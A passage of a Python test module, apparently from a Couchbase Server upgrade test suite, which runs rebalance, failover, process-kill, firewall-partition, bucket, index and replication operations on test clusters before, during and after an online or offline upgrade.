def test_upgrade(self):
self.event_threads = []
self.after_event_threads = []
try:
self.log.info("\n*** Start init operations before upgrade begins ***")
if self.initialize_events:
initialize_events = self.run_event(self.initialize_events)
self.finish_events(initialize_events)
if not self.success_run and self.failed_thread is not None:
raise Exception("*** Failed to {0} ***".format(self.failed_thread))
self.cluster_stats(self.servers[:self.nodes_init])
if self.before_events:
self.event_threads += self.run_event(self.before_events)
self.log.info("\n*** Start upgrade cluster ***")
self.event_threads += self.upgrade_event()
self.finish_events(self.event_threads)
self.log.info("\nWill install upgrade version to any free nodes")
out_nodes = self._get_free_nodes()
self.log.info("Here is free nodes {0}".format(out_nodes))
""" only install nodes out when there is cluster operation """
cluster_ops = ["rebalance_in", "rebalance_out", "rebalance_in_out"]
for event in self.after_events[0].split("-"):
if event in cluster_ops:
self.log.info(
"\n\nThere are cluster ops after upgrade. "
"Need to install free nodes in upgrade version")
self.initial_version = self.upgrade_versions[0]
self._install(out_nodes)
break
self.generate_map_nodes_out_dist_upgrade(
self.after_upgrade_services_out_dist)
self.log.info("\n\n*** Start operations after upgrade is done ***")
self.add_built_in_server_user()
if self.after_events:
self.after_event_threads = self.run_event(self.after_events)
self.finish_events(self.after_event_threads)
if not self.success_run and self.failed_thread is not None:
raise Exception("*** Failed to {0} ***".format(self.failed_thread))
""" Default set to always verify data """
if self.after_events[0]:
self.log.info("*** Start after events ***")
for event in self.after_events[0].split("-"):
if "delete_buckets" in event:
self.log.info("After events has delete buckets event. "
"No items verification needed")
self.verify_after_events = False
break
if self.verify_after_events:
self.log.info("*** Start data verification ***")
self.cluster_stats(list(self.in_servers_pool.values()))
self._verify_data_active_replica()
except Exception as ex:
self.log.info(ex)
print("*** Stop all events to stop the test ***")
self.stop_all_events(self.event_threads)
self.stop_all_events(self.after_event_threads)
raise
finally:
self.log.info("any events for which we need to cleanup")
self.cleanup_events()
def _record_vbuckets(self, master, servers):
bucket_map = dict()
for bucket in self.buckets:
self.log.info("Record vbucket for the bucket {0}"
.format(bucket.name))
bucket_map[bucket.name] = RestHelper(RestConnection(master))\
._get_vbuckets(servers, bucket_name=bucket.name)
return bucket_map
def _find_master(self):
self.master = list(self.in_servers_pool.values())[0]
def _verify_data_active_replica(self):
""" set data_analysis True by default """
self.data_analysis = self.input.param("data_analysis", False)
self.total_vbuckets = self.initial_vbuckets
if self.data_analysis:
disk_replica_dataset, disk_active_dataset = \
self.get_and_compare_active_replica_data_set_all(
list(self.in_servers_pool.values()),
self.buckets, path=None)
self.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
list(self.in_servers_pool.values()), self.buckets, path=None)
""" check vbucket distribution analysis after rebalance """
self.vb_distribution_analysis(
servers=list(self.in_servers_pool.values()),
buckets=self.buckets, std=1.0,
total_vbuckets=self.total_vbuckets)
def _verify_vbuckets(self, old_vbucket_map, new_vbucket_map):
for bucket in self.buckets:
self._verify_vbucket_nums_for_swap(old_vbucket_map[bucket.name],
new_vbucket_map[bucket.name])
def stop_all_events(self, thread_list):
for t in thread_list:
try:
if t.isAlive():
t.stop()
except Exception as ex:
self.log.info(ex)
def cleanup_events(self):
thread_list = []
for event in self.final_events:
t = threading.Thread(target=self.find_function(event), args=())
t.daemon = True
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
def run_event_in_sequence(self, events):
q = self.queue
self.log.info("run_event_in_sequence")
for event in events.split("-"):
t = threading.Thread(target=self.find_function(event), args=(q,))
t.daemon = True
t.start()
t.join()
self.success_run = True
while not self.queue.empty():
self.success_run &= self.queue.get()
if not self.success_run:
self.failed_thread = event
break
def run_event(self, events):
thread_list = []
for event in events:
if "-" in event:
t = threading.Thread(target=self.run_event_in_sequence, args=(event,))
t.start()
t.join()
elif event != '':
t = threading.Thread(target=self.find_function(event), args=())
t.daemon = True
t.start()
thread_list.append(t)
return thread_list
def find_function(self, event):
return getattr(self, event)
def finish_events(self, thread_list):
for t in thread_list:
t.join()
def upgrade_event(self):
self.log.info("upgrade_event")
thread_list = []
if self.upgrade_type == "online":
t = threading.Thread(target=self.online_upgrade, args=())
elif self.upgrade_type == "offline":
t = threading.Thread(target=self.offline_upgrade, args=())
t.daemon = True
t.start()
thread_list.append(t)
return thread_list
def server_crash(self):
try:
self.log.info("server_crash")
self.targetProcess = self.input.param("targetProcess", 'memcached')
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.terminate_process(process_name=self.targetProcess)
except Exception as ex:
self.log.info(ex)
raise
def server_stop(self):
try:
self.log.info("server_stop")
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.stop_server()
self.final_events.append("start_server")
except Exception as ex:
self.log.info(ex)
raise
def start_server(self):
try:
self.log.info("start_server")
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.start_server()
except Exception as ex:
self.log.info(ex)
raise
def failover(self, queue=None):
failover_node = False
try:
self.log.info("VVVVVV failover a node ")
print("failover node ", self.nodes_out_list)
nodes = self.get_nodes_in_cluster_after_upgrade()
failover_task = self.cluster.async_failover([self.master],
failover_nodes = self.nodes_out_list, graceful=self.graceful)
failover_task.result()
if self.graceful:
""" Check if rebalance is still running """
msg = "graceful failover failed for nodes"
self.assertTrue(RestConnection(self.master).monitorRebalance(\
stop_if_loop=True), msg=msg)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], self.nodes_out_list)
rebalance.result()
failover_node = True
else:
msg = "Failed to failover a node"
self.assertTrue(RestConnection(self.master).monitorRebalance(\
stop_if_loop=True), msg=msg)
rebalance = self.cluster.async_rebalance(nodes, [],
self.nodes_out_list)
rebalance.result()
failover_node = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if failover_node and queue is not None:
queue.put(True)
def autofailover(self):
try:
self.log.info("autofailover")
autofailover_timeout = 30
status = RestConnection(self.master).update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
servr_out = self.nodes_out_list
remote = RemoteMachineShellConnection(self.nodes_out_list[0])
remote.stop_server()
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [self.nodes_out_list[0]])
rebalance.result()
except Exception as ex:
self.log.info(ex)
raise
def network_partitioning(self):
try:
self.log.info("network_partitioning")
for node in self.nodes_out_list:
self.start_firewall_on_node(node)
self.final_events.append("undo_network_partitioning")
except Exception as ex:
self.log.info(ex)
raise
def undo_network_partitioning(self):
try:
self.log.info("remove_network_partitioning")
for node in self.nodes_out_list:
self.stop_firewall_on_node(node)
except Exception as ex:
self.log.info(ex)
raise
def bucket_compaction(self):
try:
self.log.info("couchbase_bucket_compaction")
compact_tasks = []
for bucket in self.buckets:
compact_tasks.append(self.cluster.async_compact_bucket(self.master, bucket))
except Exception as ex:
self.log.info(ex)
raise
def warmup(self, queue=None):
node_warmuped = False
try:
self.log.info("Start warmup operation")
nodes = self.get_nodes_in_cluster_after_upgrade()
for server in nodes:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
ClusterOperationHelper.wait_for_ns_servers_or_assert(nodes, self)
node_warmuped = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if node_warmuped and queue is not None:
queue.put(True)
def create_lww_bucket(self):
self.time_synchronization='enabledWithOutDrift'
bucket='default'
print('time_sync {0}'.format(self.time_synchronization))
helper = RestHelper(self.rest)
if not helper.bucket_exists(bucket):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(
self.servers)
info = self.rest.get_nodes_self()
self.rest.create_bucket(bucket=bucket,
ramQuotaMB=512, authType='sasl', timeSynchronization=self.time_synchronization)
try:
ready = BucketOperationHelper.wait_for_memcached(self.master,
bucket)
self.assertTrue(ready, '', msg = '[ERROR] Expect bucket creation to not work.')
finally:
self.log.info("Success, created lww bucket")
def bucket_flush(self, queue=None):
bucket_flushed = False
try:
self.log.info("bucket_flush ops")
self.rest =RestConnection(self.master)
for bucket in self.buckets:
self.rest.flush_bucket(bucket.name)
bucket_flushed = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if bucket_flushed and queue is not None:
queue.put(True)
def delete_buckets(self, queue=None):
bucket_deleted = False
try:
self.log.info("delete_buckets")
self.rest = RestConnection(self.master)
for bucket in self.buckets:
self.log.info("delete bucket {0}".format(bucket.name))
self.rest.delete_bucket(bucket.name)
bucket_deleted = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if bucket_deleted and queue is not None:
queue.put(True)
def create_buckets(self, queue=None):
bucket_created = False
try:
self.log.info("create_buckets")
if self.dgm_run:
self.bucket_size = 256
self.default_bucket = False
self.sasl_buckets = 1
self.sasl_bucket_name = self.sasl_bucket_name + "_" \
+ str(self.total_buckets)
self.rest = RestConnection(self.master)
self._bucket_creation()
self.sleep(5, "sleep after create bucket")
self.total_buckets +=1
bucket_created = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if bucket_created and queue is not None:
queue.put(True)
def change_bucket_properties(self):
try:
self.rest = RestConnection(self.master)
#Change Bucket Properties
for bucket in self.buckets:
self.rest.change_bucket_props(bucket, ramQuotaMB=None,\
authType=None, saslPassword=None, replicaNumber=0,\
proxyPort=None, replicaIndex=None, flushEnabled=False)
except Exception as ex:
self.log.info(ex)
raise
def rebalance_in(self, queue=None):
rebalance_in = False
service_in = copy.deepcopy(self.after_upgrade_services_in)
if service_in is None:
service_in = ["kv"]
free_nodes = self._convert_server_map(self._get_free_nodes())
if not list(free_nodes.values()):
raise Exception("No free node available to rebalance in")
try:
self.nodes_in_list = list(self.out_servers_pool.values())[:self.nodes_in]
if int(self.nodes_in) == 1:
if len(list(free_nodes.keys())) > 1:
free_node_in = [list(free_nodes.values())[0]]
if len(self.after_upgrade_services_in) > 1:
service_in = [self.after_upgrade_services_in[0]]
else:
free_node_in = list(free_nodes.values())
self.log.info("<<<=== rebalance_in node {0} with services {1}"\
.format(free_node_in, service_in[0]))
rebalance = \
self.cluster.async_rebalance(self.servers[:self.nodes_init],
free_node_in,
[], services = service_in)
rebalance.result()
self.in_servers_pool.update(free_nodes)
rebalance_in = True
if any("index" in services for services in service_in):
self.log.info("Set storageMode to forestdb after add "
"index node {0} to cluster".format(list(free_nodes.keys())))
RestConnection(list(free_nodes.values())[0]).set_indexer_storage_mode()
if self.after_upgrade_services_in and \
len(self.after_upgrade_services_in) > 1:
self.log.info("remove service '{0}' from service list after "
"rebalance done ".format(self.after_upgrade_services_in[0]))
self.after_upgrade_services_in.pop(0)
self.sleep(10, "wait 10 seconds after rebalance")
if free_node_in and free_node_in[0] not in self.servers:
self.servers.append(free_node_in[0])
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if rebalance_in and queue is not None:
queue.put(True)
def rebalance_out(self, queue=None):
rebalance_out = False
try:
self.log.info("=====>>>> rebalance_out node {0}"\
.format(self.nodes_out_list))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],\
[], self.nodes_out_list)
rebalance.result()
rebalance_out = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if rebalance_out and queue is not None:
queue.put(True)
def rebalance_in_out(self, queue=None):
rebalance_in_out = False
try:
self.nodes_in_list = list(self.out_servers_pool.values())[:self.nodes_in]
self.log.info("<<<<<===== rebalance_in node {0}"\
.format(self.nodes_in_list))
self.log.info("=====>>>>> rebalance_out node {0}"\
.format(self.nodes_out_list))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],\
self.nodes_in_list, self.nodes_out_list,\
services = self.after_upgrade_services_in)
rebalance.result()
rebalance_in_out = True
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if rebalance_in_out and queue is not None:
queue.put(True)
def incremental_backup(self):
self.log.info("incremental_backup")
def full_backup(self):
self.log.info("full_backup")
def cb_collect_info(self):
try:
self.log.info("cb_collect_info")
log_file_name = "/tmp/sample.zip"
output, error = self.shell.execute_cbcollect_info("%s" % (log_file_name))
except Exception as ex:
raise
finally:
self.log.info(ex)
def create_index(self, queue=None):
self.log.info("create_index")
self.index_list = {}
create_index = False
self._initialize_n1ql_helper()
try:
self.n1ql_helper.create_primary_index(using_gsi = True,
server = self.n1ql_server)
#self.n1ql_helper.create_primary_index(using_gsi = False,
# server = self.n1ql_server)
self.log.info("done create_index")
create_index = True
except Exception as e:
self.log.info(e)
if queue is not None:
queue.put(False)
if create_index and queue is not None:
queue.put(True)
def create_index_with_replica_and_query(self, queue=None):
""" ,groups=simple,reset_services=True
"""
self.log.info("Create index with replica and query")
self.n1ql_node = self.get_nodes_from_services_map(service_type="n1ql")
self._initialize_n1ql_helper()
self.index_name_prefix = "random_index_" + str(randint(100000, 999999))
create_index_query = "CREATE INDEX " + self.index_name_prefix + \
" ON default(age) USING GSI WITH {{'num_replica': {0}}};"\
.format(self.num_index_replicas)
try:
self.create_index()
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as e:
self.log.info(e)
self.sleep(30)
index_map = self.get_index_map()
self.log.info(index_map)
if not self.expected_err_msg:
self.n1ql_helper.verify_replica_indexes([self.index_name_prefix],
index_map,
self.num_index_replicas)
def verify_index_with_replica_and_query(self, queue=None):
index_map = self.get_index_map()
try:
self.n1ql_helper.verify_replica_indexes([self.index_name_prefix],
index_map,
self.num_index_replicas)
except Exception as e:
self.log.info(e)
if queue is not None:
queue.put(False)
def create_views(self, queue=None):
self.log.info("*** create_views ***")
""" default is 1 ddoc. Change number of ddoc by param ddocs_num=new_number
default is 2 views. Change number of views by param
view_per_ddoc=new_view_per_doc """
try:
self.create_ddocs_and_views(queue)
except Exception as e:
self.log.info(e)
def query_views(self, queue=None):
self.log.info("*** query_views ***")
try:
self.verify_all_queries(queue)
except Exception as e:
self.log.info(e)
def drop_views(self):
self.log.info("drop_views")
def drop_index(self):
self.log.info("drop_index")
for bucket_name in list(self.index_list.keys()):
query = "drop index {0} on {1} using gsi"\
.format(self.index_list[bucket_name], bucket_name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
def query_explain(self):
self.log.info("query_explain")
for bucket in self.buckets:
query = "select count(*) from {0}".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
query = "explain select count(*) from {0}".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
query = "select count(*) from {0} where field_1 = 1".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
query = "explain select count(*) from {0} where field_1 = 1".format(bucket.name)
self.n1ql_helper.run_cbq_query(query, self.n1ql_server)
def change_settings(self):
try:
status = True
if "update_notifications" in self.input.test_params:
status &= self.rest.update_notifications(str(self.input.param("update_notifications", 'true')).lower())
if "autofailover_timeout" in self.input.test_params:
status &= self.rest.update_autofailover_settings(True, self.input.param("autofailover_timeout", None))
if "autofailover_alerts" in self.input.test_params:
status &= self.rest.set_alerts_settings('couchbase@localhost', 'root@localhost', 'user', 'pwd')
if "autocompaction" in self.input.test_params:
tmp, _, _ = self.rest.set_auto_compaction(viewFragmntThresholdPercentage=
self.input.param("autocompaction", 50))
status &= tmp
if not status:
self.fail("some settings were not set correctly!")
except Exception as ex:
self.log.info(ex)
raise
def create_eventing_services(self, queue=None):
""" Only work after cluster upgrade to 5.5.0 completely """
try:
rest = RestConnection(self.master)
cb_version = rest.get_nodes_version()
if 5.5 > float(cb_version[:3]):
self.log.info("This eventing test is only for cb version 5.5 and later.")
return
bucket_params = self._create_bucket_params(server=self.master, size=128,
replicas=self.num_replicas)
self.cluster.create_standard_bucket(name=self.src_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.src_bucket = RestConnection(self.master).get_buckets()
self.cluster.create_standard_bucket(name=self.dst_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.metadata_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.dst_bucket_name1, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.source_bucket_mutation_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.cluster.create_standard_bucket(name=self.dst_bucket_curl_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.gens_load = self.generate_docs(self.docs_per_day)
self.expiry = 3
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
""" must be self.rest to pass in deploy_function"""
self.rest = RestConnection(self.restServer)
self.load(self.gens_load, buckets=self.buckets, flag=self.item_flag, verify_data=False,
batch_size=self.batch_size)
event = EventingHelper(servers=self.servers,master=self.master)
event.deploy_bucket_op_function()
event.verify_documents_in_destination_bucket('test_import_function_1', 1, 'dst_bucket')
event.undeploy_bucket_op_function()
event.deploy_curl_function()
event.verify_documents_in_destination_bucket('bucket_op_curl', 1, 'dst_bucket_curl')
event.undeploy_curl_function()
event.deploy_sbm_function()
event.verify_documents_in_destination_bucket('bucket_op_sbm', 1, 'source_bucket_mutation')
event.undeploy_sbm_function()
self.undeploy_and_delete_function(body)
except Exception as e:
self.log.info(e)
def create_cbas_services(self, queue=None):
"""
This test only need max 4 servers to run and only upgrade to vulcan and later
Command to run:
upgrade.upgrade_tests.UpgradeTests.test_upgrade,items=5000,initial_version=4.6.4-xxxx,
nodes_init=3,initialize_events=kv_ops_initialize,upgrade_services_in='kv:index',
after_events=rebalance_in-create_cbas_services,after_upgrade_services_in=cbas,
dgm_run=true,upgrade_test=True,skip_init_check_cbserver=true,released_upgrade_version=5.5.0-xxx
"""
try:
self.validate_error = False
rest = RestConnection(self.master)
cb_version = rest.get_nodes_version()
if 5.5 > float(cb_version[:3]):
self.log.info("This analytic test is only for cb version 5.5 and later.")
return
self.log.info("Get cbas nodes in cluster")
cbas_node = self.get_nodes_from_services_map(service_type="cbas")
cbas_rest = RestConnection(self.servers[self.nodes_init])
self.get_services_map()
kv_nodes = copy.deepcopy(self.servers)
kv_maps = [x.replace(":8091", "") for x in self.services_map["kv"]]
self.log.info("Get kv node in cluster")
for i, node in enumerate(kv_nodes):
if node.ip not in kv_maps:
del kv_nodes[i]
self.cbas_node = cbas_node
self.load_sample_buckets(servers=kv_nodes, bucketName="travel-sample",
total_items=31591, rest=cbas_rest)
self.test_create_dataset_on_bucket()
except Exception as e:
self.log.info(e)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def online_upgrade(self):
try:
self.log.info("online_upgrade")
self.initial_version = self.upgrade_versions[0]
self.sleep(self.sleep_time,
"Pre-setup of old version is done. "
"Wait for online upgrade to {0} version"
.format(self.initial_version))
self.product = 'couchbase-server'
if self.online_upgrade_type == "swap":
self.online_upgrade_swap_rebalance()
else:
self.online_upgrade_incremental()
except Exception as ex:
self.log.info(ex)
raise
def online_upgrade_swap_rebalance(self):
self.log.info("online_upgrade_swap_rebalance")
self.swap_num_servers = self.input.param('swap_num_servers', 1)
servers = self._convert_server_map(self.servers[:self.nodes_init])
out_servers = self._convert_server_map(self.servers[self.nodes_init:])
self.swap_num_servers = min(self.swap_num_servers, len(out_servers))
start_services_num = 0
for i in range(self.nodes_init // self.swap_num_servers):
servers_in = {}
new_servers = copy.deepcopy(servers)
servicesNodeOut = ""
for key in list(out_servers.keys()):
servers_in[key] = out_servers[key]
out_servers[key].upgraded = True
out_servers.pop(key)
if len(servers_in) == self.swap_num_servers:
break
servers_out = {}
node_out = None
new_servers.update(servers_in)
for key in list(servers.keys()):
if len(servers_out) == self.swap_num_servers:
break
elif not servers[key].upgraded:
servers_out[key] = servers[key]
new_servers.pop(key)
out_servers.update(servers_out)
rest = RestConnection(list(servers.values())[0])
self.log.info("****************************************".format(servers))
self.log.info("cluster nodes = {0}".format(list(servers.values())))
self.log.info("cluster service map = {0}".format(rest.get_nodes_services()))
self.log.info("cluster version map = {0}".format(rest.get_nodes_version()))
self.log.info("to include in cluster = {0}".format(list(servers_in.values())))
self.log.info("to exclude from cluster = {0}".format(list(servers_out.values())))
self.log.info("****************************************".format(servers))
rest = RestConnection(list(servers_out.values())[0])
servicesNodeOut = rest.get_nodes_services()
servicesNodeOut = ",".join(servicesNodeOut[list(servers_out.keys())[0]] )
self._install(list(servers_in.values()))
self.sleep(10, "Wait for ns server is ready")
old_vbucket_map = self._record_vbuckets(self.master, list(servers.values()))
try:
if self.upgrade_services_in == "same":
self.cluster.rebalance(list(servers.values()),
list(servers_in.values()),
list(servers_out.values()),
services=[servicesNodeOut])
elif self.upgrade_services_in is not None \
and len(self.upgrade_services_in) > 0:
tem_services = self.upgrade_services_in[
start_services_num:start_services_num
+ len(list(servers_in.values()))]
self.cluster.rebalance(list(servers.values()),
list(servers_in.values()),
list(servers_out.values()),
services=tem_services)
start_services_num += len(list(servers_in.values()))
else:
self.cluster.rebalance(list(servers.values()),
list(servers_in.values()),
list(servers_out.values()))
except Exception as ex:
self.log.info(ex)
raise
self.out_servers_pool = servers_out
self.in_servers_pool = new_servers
servers = new_servers
self.servers = list(servers.values())
self.master = self.servers[0]
if self.verify_vbucket_info:
new_vbucket_map = self._record_vbuckets(self.master, self.servers)
self._verify_vbuckets(old_vbucket_map, new_vbucket_map)
# in the middle of online upgrade events
if self.in_between_events:
self.event_threads = []
self.event_threads += self.run_event(self.in_between_events)
self.finish_events(self.event_threads)
self.in_between_events = None
def online_upgrade_incremental(self):
self.log.info("online_upgrade_incremental")
try:
for server in self.servers[1:]:
self.cluster.rebalance(self.servers, [], [server])
self.initial_version = self.upgrade_versions[0]
self.sleep(self.sleep_time, "Pre-setup of old version is done. Wait for online upgrade to {0} version".\
format(self.initial_version))
self.product = 'couchbase-server'
self._install([server])
self.sleep(self.sleep_time, "Installation of new version is done. Wait for rebalance")
self.cluster.rebalance(self.servers, [server], [])
self.log.info("Rebalanced in upgraded nodes")
self.sleep(self.sleep_time)
self._new_master(self.servers[1])
self.cluster.rebalance(self.servers, [], [self.servers[0]])
self.log.info("Rebalanced out all old version nodes")
except Exception as ex:
self.log.info(ex)
raise
def offline_upgrade(self):
if self.offline_upgrade_type == "offline_shutdown":
self._offline_upgrade()
elif self.offline_upgrade_type == "offline_failover":
self._offline_failover_upgrade()
def failover_add_back(self):
try:
rest = RestConnection(self.master)
recoveryType = self.input.param("recoveryType", "full")
servr_out = self.nodes_out_list
failover_task =self.cluster.async_failover([self.master],
failover_nodes = servr_out, graceful=self.graceful)
failover_task.result()
nodes_all = rest.node_statuses()
nodes = []
if servr_out[0].ip == "127.0.0.1":
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if (str(node.port) == failover_node.port)])
else:
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
self.log.info(node)
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id, recoveryType=recoveryType)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
rebalance.result()
except Exception as ex:
raise
def auto_retry_with_rebalance_in(self, queue=None):
self.change_retry_rebalance_settings(True, 300, 1)
rebalance_in = False
service_in = copy.deepcopy(self.after_upgrade_services_in)
if service_in is None:
service_in = ["kv"]
free_nodes = self._convert_server_map(self._get_free_nodes())
free_node_in = []
if not free_nodes.values():
raise Exception("No free node available to rebalance in")
try:
self.nodes_in_list = self.out_servers_pool.values()[:self.nodes_in]
if int(self.nodes_in) == 1:
if len(free_nodes.keys()) > 1:
free_node_in = [free_nodes.values()[0]]
if len(self.after_upgrade_services_in) > 1:
service_in = [self.after_upgrade_services_in[0]]
else:
free_node_in = free_nodes.values()
self.log.info("<<<=== rebalance_in node {0} with services {1}" \
.format(free_node_in, service_in[0]))
shell = RemoteMachineShellConnection(free_node_in[0])
shell.stop_server()
rebalance = \
self.cluster.async_rebalance(self.servers[:self.nodes_init],
free_node_in,
[], services=service_in)
rebalance.result()
self.in_servers_pool.update(free_nodes)
rebalance_in = True
if any("index" in services for services in service_in):
self.log.info("Set storageMode to forestdb after add "
"index node {0} to cluster".format(free_nodes.keys()))
RestConnection(free_nodes.values()[0]).set_indexer_storage_mode()
if self.after_upgrade_services_in and \
len(self.after_upgrade_services_in) > 1:
self.log.info("remove service '{0}' from service list after "
"rebalance done ".format(self.after_upgrade_services_in[0]))
self.after_upgrade_services_in.pop(0)
self.sleep(10, "wait 10 seconds after rebalance")
if free_node_in and free_node_in[0] not in self.servers:
self.servers.append(free_node_in[0])
except Exception as ex:
self.log.info("Rebalance failed with : {0}".format(str(ex)))
self.check_retry_rebalance_succeeded()
if queue is not None:
queue.put(False)
else:
self.fail("Rebalance did not fail as expected. Hence could not validate auto-retry feature..")
finally:
self.start_server(free_node_in[0])
if rebalance_in and queue is not None:
queue.put(True)
def kv_ops_initialize(self, queue=None):
try:
self.log.info("kv_ops_initialize")
self._load_all_buckets(self.master, self.gen_initial_create,
"create", self.expire_time,
flag=self.item_flag)
self.log.info("done kv_ops_initialize")
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
raise
if queue is not None:
queue.put(True)
def kv_after_ops_create(self, queue=None):
try:
self.log.info("kv_after_ops_create")
self._load_all_buckets(self.master, self.after_gen_create, "create",\
self.expire_time, flag=self.item_flag)
for bucket in self.buckets:
self.log.info(" record vbucket for the bucket {0}"\
.format(bucket.name))
curr_items = \
RestConnection(self.master).get_active_key_count(bucket.name)
self.log.info("{0} curr_items in bucket {1} "\
.format(curr_items, bucket.name))
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def kv_after_ops_update(self):
try:
self.log.info("kv_after_ops_update")
self._load_all_buckets(self.master, self.after_gen_update, "update",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def kv_after_ops_delete(self):
try:
self.log.info("kv_after_ops_delete")
self._load_all_buckets(self.master, self.after_gen_delete,
"delete", self.expire_time,
flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def doc_ops_initialize(self, queue=None):
try:
self.log.info("load doc to all buckets")
self._load_doc_data_all_buckets(data_op="create", batch_size=1000,
gen_load=None)
self.log.info("done initialize load doc to all buckets")
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def kv_ops_create(self):
try:
self.log.info("kv_ops_create")
self._load_all_buckets(self.master, self.gen_create, "create",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def kv_ops_update(self):
try:
self.log.info("kv_ops_update")
self._load_all_buckets(self.master, self.gen_update, "update",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def kv_ops_delete(self):
try:
self.log.info("kv_ops_delete")
self._load_all_buckets(self.master, self.gen_delete, "delete",
self.expire_time, flag=self.item_flag)
except Exception as ex:
self.log.info(ex)
raise
def add_sub_doc(self):
try:
self.log.info("add sub doc")
"""add sub doc code here"""
except Exception as ex:
self.log.info(ex)
raise
def create_fts_index(self, queue=None):
try:
self.log.info("Checking if index already exists ...")
name = "default"
""" test on one bucket """
for bucket in self.buckets:
name = bucket.name
break
SOURCE_CB_PARAMS = {
"authUser": "default",
"authPassword": "",
"authSaslUser": "",
"authSaslPassword": "",
"clusterManagerBackoffFactor": 0,
"clusterManagerSleepInitMS": 0,
"clusterManagerSleepMaxMS": 20000,
"dataManagerBackoffFactor": 0,
"dataManagerSleepInitMS": 0,
"dataManagerSleepMaxMS": 20000,
"feedBufferSizeBytes": 0,
"feedBufferAckThreshold": 0
}
self.index_type = 'fulltext-index'
self.index_definition = {
"type": "fulltext-index",
"name": "",
"uuid": "",
"params": {},
"sourceType": "couchbase",
"sourceName": "",
"sourceUUID": "",
"sourceParams": SOURCE_CB_PARAMS,
"planParams": {}
}
self.name = self.index_definition['name'] = \
self.index_definition['sourceName'] = name
fts_node = self.get_nodes_from_services_map(
"fts", servers=self.get_nodes_in_cluster_after_upgrade())
if fts_node:
rest = RestConnection(fts_node)
status, _ = rest.get_fts_index_definition(self.name)
if status != 400:
rest.delete_fts_index(self.name)
self.log.info("Creating {0} {1} on {2}"
.format(self.index_type, self.name, rest.ip))
rest.create_fts_index(self.name, self.index_definition)
else:
raise("No FTS node in cluster")
self.ops_dist_map = self.calculate_data_change_distribution(
create_per=self.create_ops_per, update_per=self.update_ops_per,
delete_per=self.delete_ops_per, expiry_per=self.expiry_ops_per,
start=0, end=self.docs_per_day)
self.log.info(self.ops_dist_map)
self.dataset = "default"
self.docs_gen_map = self.generate_ops_docs(self.docs_per_day, 0)
self.async_ops_all_buckets(self.docs_gen_map, batch_size=100)
except Exception as ex:
self.log.info(ex)
def create_fts_index_query(self, queue=None):
try:
self.fts_obj = self.create_fts_index_query_compare()
return self.fts_obj
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def xdcr_create_replication(self):
try:
self.xdcr_handle._create_replication()
except Exception as ex:
self.log.info(ex)
def xdcr_set_replication_properties(self):
try:
param_str = self.__input.param(
"%s@%s" %
("default", "C"), None)
self.xdcr_handle._set_replication_properties(param_str)
except Exception as ex:
self.log.info(ex)
def xdcr_get_replication_properties(self):
try:
self.xdcr_handle._get_replication_properties()
except Exception as ex:
self.log.info(ex)
def create_n1ql_index_query(self, queue=None):
try:
self.create_n1ql_index_and_query()
#return self.n1ql_obj
except Exception as ex:
self.log.info(ex)
if queue is not None:
queue.put(False)
if queue is not None:
queue.put(True)
def cluster_stats(self, servers):
self._wait_for_stats_all_buckets(servers)
def _initialize_n1ql_helper(self):
if self.n1ql_helper is None:
